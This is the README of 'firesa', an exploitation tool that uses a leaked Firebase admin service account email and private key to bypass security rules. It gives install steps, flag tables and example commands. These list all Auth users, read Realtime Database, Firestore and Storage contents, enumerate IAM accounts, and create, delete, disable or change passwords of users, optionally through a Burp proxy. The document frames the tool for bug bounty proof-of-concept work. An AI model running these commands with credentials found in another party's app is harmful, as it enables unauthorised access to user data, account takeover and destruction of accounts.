Firebase service account exploitation script. Enumerates data across Firebase services using a leaked service account's client_email and private_key. Can be used to create a quick PoC. It does not have all possible API calls implemented but it has enough to show impact.
Service accounts with admin-level roles (e.g. firebase-adminsdk) bypass all Firebase security rules, granting unrestricted access to services such as Auth, Realtime Database, Firestore, Storage.
Have you ever found a firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com and a -----BEGIN PRIVATE KEY----- hardcoded in an APK file but didn't know what to do with it? Or perhaps you've spent way too much time digging through Firebase REST API documentation trying to figure out what parameters and endpoints are required to make valid requests.
This tool lets you immediately show impact when you find these service accounts — enumerate users, create/delete users, list databases, list storage files, and more.
uv tool install --force .firesa --service-account EMAIL --private-key KEY [options]
--private-key accepts a PEM file path or an inline key string (with \n escapes).
--project-id is extracted from the service account email by default.
| Flag | Description |
|---|---|
--list-all |
List data from all services |
--list-users |
List Firebase Auth users (default if no command given) |
--lookup-user EMAIL |
Look up a single user by email |
--list-rtdb |
List RTDB instances and read root keys (tries both URL formats, handles regional redirects) |
--list-firestore |
List Firestore databases and root collections |
--list-storage |
List files in Storage buckets (tries both .appspot.com and .firebasestorage.app) |
--list-iam |
List service accounts in the project |
| Flag | Description |
|---|---|
--create-user EMAIL PASSWORD |
Create a new user (optionally combine with --set-display-name) |
--delete-user UID |
Delete a user by UID |
--update-user UID |
Update a user (requires at least one --set-* flag) |
--set-email |
Set email address |
--set-display-name |
Set display name |
--set-password |
Set password |
--set-phone |
Set phone number |
--set-disabled true/false |
Disable or enable account |
| Flag | Description |
|---|---|
--check-permissions |
Check IAM permissions without reading or modifying data |
--max-users N |
Max users to list (default: 100) |
--max-files N |
Max storage files to list (default: 100) |
--bucket NAME |
Override storage bucket name |
--json |
Output raw JSON |
--proxy, -x |
HTTP proxy (e.g. http://127.0.0.1:8080) |
# List first 100 users
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
--private-key key.pem
# List everything
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
--private-key key.pem --list-all
# Check what the service account can do
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
--private-key key.pem --check-permissions
# Look up a specific user
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
--private-key key.pem --lookup-user user@example.com
# Create a user
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
--private-key key.pem --create-user test@example.com password123
# Delete a user
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
--private-key key.pem --delete-user USER_UID
# Update a user
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
--private-key key.pem --update-user USER_UID --set-display-name "Test" --set-disabled true
# List storage files as JSON through Burp
firesa --service-account firebase-adminsdk-xxx@my-project.iam.gserviceaccount.com \
--private-key key.pem --list-storage --json -x http://127.0.0.1:8080